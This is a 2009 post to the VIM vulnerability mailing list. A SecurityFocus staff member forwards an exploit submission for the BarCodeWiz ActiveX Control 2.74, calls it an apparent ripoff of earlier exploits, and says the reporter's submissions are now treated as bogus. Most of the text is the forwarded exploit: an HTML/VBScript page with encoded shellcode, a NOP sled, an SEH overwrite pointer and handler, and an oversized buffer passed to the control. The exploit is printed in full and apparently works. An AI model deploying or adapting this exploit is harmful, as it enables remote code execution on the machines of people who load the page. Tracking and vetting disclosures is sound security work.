[VIM] [Fwd: new bug | BarCodeWiz Barcode ActiveX Control 2.74 (BarcodeWiz.dll) SEH Overwrite]

Rob Keith rkeith at securityfocus.com
Mon Mar 16 18:37:02 UTC 2009 

Hey,

Seen a few exploits from 'Faryad Rahmany' from a number of different email addresses in the last
month or so. Most if not all of which, including this one, look to be ripoffs from other peoples
exploits (BID 23891: http://downloads.securityfocus.com/vulnerabilities/exploits/23891-Parveen.html,
www.milw0rm.com/exploits/download/3882). In this case, the only change is the method being called,
the length of 'A' s, and of course the credit.

Anyways, we've started treating anything from this reporter as bogus reports. If any one else has
further insights, please pass them along.

Thanks,
Rob

-------- Original Message --------
Subject: 	new bug | BarCodeWiz Barcode ActiveX Control 2.74
(BarcodeWiz.dll) SEH Overwrite
Date: 	Mon, 16 Mar 2009 11:04:11 -0700 (PDT)
From: 	Mr.YaHoO <y4ho0_emperor at yahoo.com>
To: 	vuldb at securityfocus.com
CC: 	str0ke at milw0rm.com, secalert at securityreason.com

--------------------------------------------------------------------------------------------------------------------------------
                      \\\|///
                    \\  - -  //      Y! Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              This Bug Discover By Ciph3r
              Email: Ciph3r_blackhat at yahoo.com
              Author   :  Faryad Rahmany
	        HomePage :  http://Attacker.ir  &  http://2600.ir & http://rahmany.net
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/

----------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6" > </OBJECT>
<script language="vbscript">

    shellcode = shellcode + unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
    shellcode = shellcode + unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
    shellcode = shellcode + unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34")
    shellcode = shellcode + unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
    shellcode = shellcode + unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54")
    shellcode = shellcode + unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37")
    shellcode = shellcode + unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48")
    shellcode = shellcode + unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38")
    shellcode = shellcode + unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c")
    shellcode = shellcode + unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e")
    shellcode = shellcode + unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48")
    shellcode = shellcode + unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54")
    shellcode = shellcode + unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38")
    shellcode = shellcode + unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43")
    shellcode = shellcode + unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37")
    shellcode = shellcode + unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a")
    shellcode = shellcode + unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b")
    shellcode = shellcode + unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33")
    shellcode = shellcode + unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57")
    shellcode = shellcode + unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49")
    shellcode = shellcode + unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36")
    shellcode = shellcode + unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")


nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")

pointer_seh=unescape("%eb%06%90%90")

seh_handler=unescape("%a9%11%02%75")
targetFile = "C:\Program Files\BarCodeWiz ActiveX Demo\DLL\BarcodeWiz.dll"
prototype  = "Property Let Barcode As String"
memberName = "Barcode"
progid     = "BARCODEWIZLib.BarCodeWiz"
argCount   = 1

arg1=String(13332, "A")

arg1=arg1+pointer_seh+seh_handler+nop+shellcode+nop

target.Barcode arg1

</script>
</body>
</html>
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: BarCodeWiz Barcode ActiveX Control 2.74 (BarcodeWiz.dll)	SEH Overwrite.txt
Url: http://www.attrition.org/pipermail/vim/attachments/20090316/1ece2c1a/attachment.txt

More information about the VIM mailing list